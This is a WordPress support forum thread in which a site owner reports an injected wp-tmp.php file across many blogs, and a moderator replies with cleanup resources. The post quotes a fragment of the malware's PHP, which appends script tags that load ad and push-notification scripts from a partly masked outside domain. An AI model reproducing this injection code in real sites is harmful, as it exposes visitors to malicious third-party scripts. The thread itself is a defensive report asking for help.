Malware detected

  • cristiweb2

    (@cristiweb2)


    5 years, 7 months ago

    Hello,

    I’ve found some malware injected code into /wp-includes.
    There is a file there named “wp-tmp.php”.

    And it has something like
    “$con2 = ‘

    <script type=”text/javascript” src=”//go.xxxx.com/apu.php?zoneid=1587119″></script>
    <script async=”async” type=”text/javascript” src=”//go.xxx.com/notice.php?p=1587121&interactive=1&pushup=1″></script>
    <script src=”//xxx.com/ntfc.php?p=1587123″ data-cfasync=”false” async></script>
    <script src=”//go.xxx.com/notice.php?p=1587122&interstitial=1″></script>
    ‘;

    $content=$content.$con2;

    I’m using a shared hosting and I have like 20-30 wordpress blogs there, with one cpanel.
    So I think because of a plugin or theme, this malware has propagated on all the websites.

    What I did was to create a blank file named wp-tmp.php and upload it over the existing one, giving it 0 permission.

    So I think when the malware will try to create this file, it won’t be able.

    Any other ideas?

    I’ve updated the wordpress versions, but it will be really hard to debug and understand from this is coming from because of so many websites and various plugins.

Viewing 1 replies (of 1 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    5 years, 7 months ago

    Please don’t post links to malware!

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Viewing 1 replies (of 1 total)
  • The topic ‘Malware detected’ is closed to new replies.

Tags